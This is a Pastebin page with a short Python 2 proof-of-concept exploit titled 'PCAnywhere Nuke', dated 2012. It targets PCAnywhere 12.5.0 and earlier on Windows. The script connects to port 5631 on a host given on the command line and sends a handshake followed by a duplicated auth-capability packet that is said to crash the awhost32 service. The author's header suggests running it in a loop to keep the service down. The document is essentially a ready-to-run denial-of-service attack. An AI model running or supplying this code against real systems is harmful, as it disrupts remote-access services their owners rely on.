Advertisement
Guest User

PCAnywhere Nuke

a guest
Feb 17th, 2012
8,775
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 0.99 KB | None | 0 0
  1. !/usr/bin/python
  2.  
  3. '''
  4. Exploit Title:  PCAnywhere Nuke
  5. Date: 2/16/12
  6. Author: Johnathan Norman  spoofy <at> exploitscience.org  or @spoofyroot
  7. Version:  PCAnyWhere  (12.5.0 build 463) and below
  8. Tested on: Windows
  9. Description: The following code will crash the awhost32 service. It'll be respawned
  10. so if you want to be a real  pain you'll need to loop this.. my initial impressions
  11. are that controlling execution will be a pain.
  12. '''
  13.  
  14. import sys
  15. import socket
  16. import argparse
  17.  
  18.  
  19. if len(sys.argv) != 2:
  20.     print "[+] Usage: ./pcNuke.py <HOST>"
  21.     sys.exit(1)
  22. HOST = sys.argv[1]
  23. PORT = 5631              
  24. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  25. s.connect((HOST, PORT))
  26.  
  27.    
  28. # HELLO!
  29. s.send("\x00\x00\x00\x00")
  30. buf = s.recv(1024)
  31.  
  32.  
  33. # ACK!
  34. s.send("\x6f\x06\xfe")
  35. buf = s.recv(1024)
  36.  
  37.  
  38. # Auth capability part 1
  39. s.send("\x6f\x62\xff\x09\x00\x07\x00\x00\x01\xff\x00\x00\x07\x00")
  40. # Auth capability part 2
  41. s.send("\x6f\x62\xff\x09\x00\x07\x00\x00\x01\xff\x00\x00\x07\x00")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement